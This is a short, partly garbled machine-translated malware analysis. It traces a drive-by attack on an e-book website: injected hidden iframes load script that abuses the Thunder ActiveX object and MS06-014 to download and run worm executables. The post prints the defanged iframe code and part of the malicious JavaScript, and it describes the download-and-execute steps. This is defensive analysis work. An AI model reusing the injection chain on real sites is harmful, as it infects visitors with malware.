Use the thunder and ms06014 vulnerabilities to spread the worm. win32.agent. A e-book website

Source: Internet
Author: User

EndurerOriginal
1Version

When browsing the website, Kaspersky reports: Malicious Script: Access denied.

Check the webpage and find the code:
/---
<IFRAME src = hxxp: // x *. K * o * 5 *** 1.com/index.htm width = 50 height = 0> </iframe>
---/

Hxxp: // x *. K * o * 5 *** 1.com/index.htmCode included:
/---
<IFRAME src = "hxxp: // x *. K * o * 5 *** 1.com/vip.htm" Height = 0 width = 0> </iframe>
<IFRAME src = "hxxp: // x *. K * o * 5 *** 1.com/vip1.htm" Height = 0 width = 0> </iframe>
<IFRAME src = "hxxp: // x *. K * o * 5 *** 1.com/vip2.htm" Height = 0 width = 0> </iframe>
---/

Hxxp: // x *. K * o * 5 *** 1.com/vip.htmContent:
/---
<SCRIPT src = "VIP. js"> </SCRIPT>
<Body onload = shit ();> <br>
---/

Shit () is defined in VIP. JS:
/---
Function shit ()
{
Try {qianxu_fan = new activexobject ("thunderserver. webthunder.1 ");}
Catch (e) {return ;}
---/

Used to create activexobject "thunderserver. webthunder.1 ".

VIP. jsImplementation using it:
Use ADODB to create a file: C:/Documents and Settings/all users/Start Menu/Program/start/Microsofts. HTA
Use shell. Run to call IE to open the webpage hxxp: // www. Mv ***** PS * f.com/kl/vip.exevips.htmand download the Virus File vip.exe
Use shell.execto run the Virus File vip5111).exe that is downloaded to the IE folder.

File Description: D:/test/vip.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time: 21:34:52
Modification time: 21:34:54
Access time:
Size: 191972 bytes, 187.484 KB
MD5: 1ac930db8829347b86517eae9cc56c0e

Rising news:Worm. win32.agent.

Hxxp: // x *. K * o * 5 *** 1.com/vip1.htmContent is US-ASCII encoding. To the http://purpleendurer.ys168.com download US-ASCII decoding program for decryption, get JavaScript code, function is to download kl.exe, save as C:/Microsoft.com, run using Shell. Application.

View-source: hxxp: // x *. K * o * 5 *** 1.com/vip2.htmContent is US-ASCII encoding. Decrypt the JavaScript code to download kl.exe, save it as C:/Microsoft.com, and create Microsoft. vbs to run it.

Kl.exe does not exist.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.